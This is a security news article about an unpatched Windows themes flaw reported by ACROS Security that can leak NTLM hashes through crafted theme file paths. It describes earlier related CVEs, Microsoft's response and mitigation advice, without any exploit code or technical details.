All versions of Windows clients, from Windows 7 to the latest Windows 11, are currently exposed to a critical 0-day vulnerability that could enable attackers to capture NTLM authentication hashes from users on affected systems. This alarming discovery was made by researchers at ACROS Security, who reported the flaw to Microsoft this week. The vulnerability came to light during their efforts to develop a patch for older Windows systems related to CVE-2024-38030, a medium-severity vulnerability concerning Windows Themes spoofing that Microsoft addressed in its July security update.
Variant of Two Previous Vulnerabilities
The vulnerability identified by ACROS bears a striking resemblance to CVE-2024-38030, facilitating what is termed an authentication coercion attack. In this scenario, a vulnerable device is manipulated into sending NTLM hashes—the cryptographic representation of a user’s password—to an attacker’s system. The initial discovery of CVE-2024-38030 was made by Akamai researcher Tomer Peled while he was analyzing Microsoft’s fix for another earlier vulnerability, CVE-2024-21320, which also involved Windows themes spoofing.
Windows themes files allow users to personalize their desktop interface through various elements such as wallpapers, screen savers, colors, and sounds. The vulnerabilities uncovered by Peled were linked to how these themes processed file paths for specific image resources, notably “BrandImage” or “Wallpaper.” Due to inadequate validation, an attacker could manipulate legitimate paths to these resources, prompting Windows to automatically send an authenticated request along with the user’s NTLM hash to the attacker’s device.
As Peled elaborated to Dark Reading, “The themes file format is an .ini file, with multiple ‘key,value’ pairs. I originally found two key,value pairs that could accept file paths.” The original vulnerability (CVE-2024-21320) arose because these pairs accepted UNC paths—a standardized format for identifying network resources—allowing a weaponized theme file to trigger an outbound connection with user authentication without their knowledge. Although Microsoft addressed this issue by implementing a check to prevent UNC paths, Peled noted that the validation function used allowed for certain bypasses, leading to the discovery of CVE-2024-38030.
Microsoft Will Act ‘As Needed’
The vulnerability reported by ACROS this week marks the third Windows themes spoofing issue stemming from the same file path problem. Mitja Kolsek, CEO of ACROS Security, stated, “Our researchers discovered the vulnerability in early October while writing a patch for CVE-2024-38030 intended for legacy Windows systems many of our users are still using.” The report was submitted to Microsoft on October 28, 2024, although ACROS has withheld details and proof-of-concept until Microsoft releases its own patch.
A Microsoft spokesperson confirmed via email that the company is aware of the report from ACROS and “will take action as needed to help keep customers protected.” However, it appears that no CVE or vulnerability identifier has been issued for this new issue yet.
Similar to the previous Windows themes spoofing vulnerabilities identified by Akamai, the new flaw does not necessitate any special privileges for an attacker. However, they must convince the user to copy a theme file to another folder on their computer and then open that folder with Windows Explorer in a view that renders icons. Alternatively, the file could be automatically downloaded to the user’s Downloads folder while visiting a malicious website, requiring the attacker to wait for the user to later view that folder.
Kolsek advises organizations to disable NTLM where feasible, although he acknowledges that this could lead to functional issues if any network components depend on it. “An attacker could only successfully target a computer where NTLM is enabled,” he explained. He also noted that a request initiated by a malicious theme file must reach the attacker’s server on the Internet or within an adjacent network, a scenario typically blocked by firewalls. Consequently, it is more probable that an attacker would exploit this flaw in a targeted campaign rather than through mass exploitation.
Akamai’s Peled expressed uncertainty regarding the specifics of ACROS’s vulnerability without access to the technical details. “But it might be another UNC bypass that circumvents the check, or it could be a different key,value pair that was missed in the original patching,” he speculated. “UNC path formats are very complex and allow for unusual combinations, making detection quite challenging. This complexity may explain the difficulties in resolving the issue.”
